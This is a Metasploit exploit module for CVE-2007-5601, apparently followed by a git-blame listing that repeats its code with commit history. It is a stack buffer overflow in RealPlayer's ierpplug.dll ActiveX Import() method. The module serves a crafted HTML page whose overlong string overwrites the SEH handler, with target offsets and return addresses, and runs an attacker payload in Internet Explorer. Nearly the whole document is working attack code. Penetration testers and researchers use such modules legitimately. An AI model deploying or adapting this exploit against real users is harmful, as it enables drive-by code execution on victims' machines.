modules/exploits/windows/browser/realplayer_import.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'RealPlayer ierpplug.dll ActiveX Control Playlist Name Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in RealOne Player V2 Gold Build 6.0.11.853 and
        RealPlayer 10.5 Build 6.0.12.1483. By sending an overly long string to the "Import()"
        method, an attacker may be able to execute arbitrary code.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'MC' ],
      'References'     =>
        [
          [ 'CVE', '2007-5601' ],
          [ 'OSVDB', '41430' ],
          [ 'BID', '26130' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'         => 800,
          'BadChars'      => "\x00\x09\x0a\x0d'\\",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'IE / RealOne Player 2 (6.0.11.853)',     { 'Offset' => 4756, 'Ret' => 0x601aa72b } ], #rpmn3260.dll (6.0.9.1419)
          [ 'IE / RealPlayer 10.5 (6.0.12.1483)',     { 'Offset' => 4768, 'Ret' => 0x614bd13b } ], #rpmn3260.dll (6.0.9.2934)
        ],
      'DisclosureDate' => 'Oct 18 2007',
      'DefaultTarget'  => 0))
  end

  def autofilter
      false
  end

  def check_dependencies
      use_zlib
  end

  def on_request_uri(cli, request)
    # Re-generate the payload
    return if ((p = regenerate_payload(cli)) == nil)

    # Randomize some things
    vname	= rand_text_alpha(rand(100) + 1)
    strname	= rand_text_alpha(rand(100) + 1)

    # Set the exploit buffer
    filler = rand_text_english(target['Offset'])
    seh    = generate_seh_payload(target.ret)
    sploit = filler + seh + rand_text_english(30724 - payload.encoded.length)

    # [id(0x60020009), helpstring("Imports a file to RealPlayer's Media Library")]
    # long Import(
    #                 [in] BSTR file,
    #                 [in, optional, defaultvalue("")] BSTR playlist,
    #                 [in, optional, defaultvalue("")] BSTR clipInfo,
    #                 [in, optional, defaultvalue(0)] long bPlayFile,
    #                 [in, optional, defaultvalue(0)] long bCopyToMyMusic);

    # Build out the message
    content = %Q|
      <html>
      <object classid='clsid:FDC7A535-4070-4B92-A0EA-D9994BCC0DC5' id='#{vname}'></object>
      <script language='javascript'>
      var #{vname} = document.getElementById('#{vname}');
      var #{strname} = new String('#{sploit}');
      #{vname}.Import("Firstrun\\\\audio.rm" ,#{strname} ,"" ,0 ,0);
      </script>
      </html>
      |

    print_status("Sending #{self.name}")

    # Transmit the response to the client
    send_response_html(cli, content)

    # Handle the payload
    handler(cli)
  end

end
added exploit module realplayer_import.rb 2007-12-02 17:58:44 +00:00			`##`
Fix up comment splats with the correct URI 2014-10-17 11:47:33 -05:00			`# This module requires Metasploit: http://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
added exploit module realplayer_import.rb 2007-12-02 17:58:44 +00:00			`##`

			`require 'msf/core'`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
Retab modules 2013-08-30 16:28:54 -05:00			`Rank = NormalRanking`
added exploit module realplayer_import.rb 2007-12-02 17:58:44 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`include Msf::Exploit::Remote::HttpServer::HTML`
			`include Msf::Exploit::Remote::Seh`
added exploit module realplayer_import.rb 2007-12-02 17:58:44 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'RealPlayer ierpplug.dll ActiveX Control Playlist Name Buffer Overflow',`
			`'Description' => %q{`
			`This module exploits a stack buffer overflow in RealOne Player V2 Gold Build 6.0.11.853 and`
			`RealPlayer 10.5 Build 6.0.12.1483. By sending an overly long string to the "Import()"`
			`method, an attacker may be able to execute arbitrary code.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' => [ 'MC' ],`
			`'References' =>`
			`[`
			`[ 'CVE', '2007-5601' ],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '41430' ],`
Retab modules 2013-08-30 16:28:54 -05:00			`[ 'BID', '26130' ],`
			`],`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'process',`
			`},`
			`'Payload' =>`
			`{`
			`'Space' => 800,`
			`'BadChars' => "\x00\x09\x0a\x0d'\\",`
			`'StackAdjustment' => -3500,`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`[ 'IE / RealOne Player 2 (6.0.11.853)', { 'Offset' => 4756, 'Ret' => 0x601aa72b } ], #rpmn3260.dll (6.0.9.1419)`
			`[ 'IE / RealPlayer 10.5 (6.0.12.1483)', { 'Offset' => 4768, 'Ret' => 0x614bd13b } ], #rpmn3260.dll (6.0.9.2934)`
			`],`
			`'DisclosureDate' => 'Oct 18 2007',`
			`'DefaultTarget' => 0))`
			`end`
added exploit module realplayer_import.rb 2007-12-02 17:58:44 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`def autofilter`
			`false`
			`end`
added exploit module realplayer_import.rb 2007-12-02 17:58:44 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`def check_dependencies`
			`use_zlib`
			`end`
added exploit module realplayer_import.rb 2007-12-02 17:58:44 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`def on_request_uri(cli, request)`
			`# Re-generate the payload`
			`return if ((p = regenerate_payload(cli)) == nil)`
added exploit module realplayer_import.rb 2007-12-02 17:58:44 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`# Randomize some things`
			`vname = rand_text_alpha(rand(100) + 1)`
			`strname = rand_text_alpha(rand(100) + 1)`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`# Set the exploit buffer`
			`filler = rand_text_english(target['Offset'])`
			`seh = generate_seh_payload(target.ret)`
			`sploit = filler + seh + rand_text_english(30724 - payload.encoded.length)`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`# [id(0x60020009), helpstring("Imports a file to RealPlayer's Media Library")]`
			`# long Import(`
			`# [in] BSTR file,`
			`# [in, optional, defaultvalue("")] BSTR playlist,`
			`# [in, optional, defaultvalue("")] BSTR clipInfo,`
			`# [in, optional, defaultvalue(0)] long bPlayFile,`
			`# [in, optional, defaultvalue(0)] long bCopyToMyMusic);`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`# Build out the message`
			`content = %Q\|`
			`<html>`
			`<object classid='clsid:FDC7A535-4070-4B92-A0EA-D9994BCC0DC5' id='#{vname}'></object>`
			`<script language='javascript'>`
			`var #{vname} = document.getElementById('#{vname}');`
			`var #{strname} = new String('#{sploit}');`
			`#{vname}.Import("Firstrun\\\\audio.rm" ,#{strname} ,"" ,0 ,0);`
			`</script>`
			`</html>`
			`\|`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`print_status("Sending #{self.name}")`
added exploit module realplayer_import.rb 2007-12-02 17:58:44 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`# Transmit the response to the client`
			`send_response_html(cli, content)`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`# Handle the payload`
			`handler(cli)`
			`end`
added exploit module realplayer_import.rb 2007-12-02 17:58:44 +00:00
OSVDB references updates from Steve Tornio 2009-07-16 16:02:24 +00:00			`end`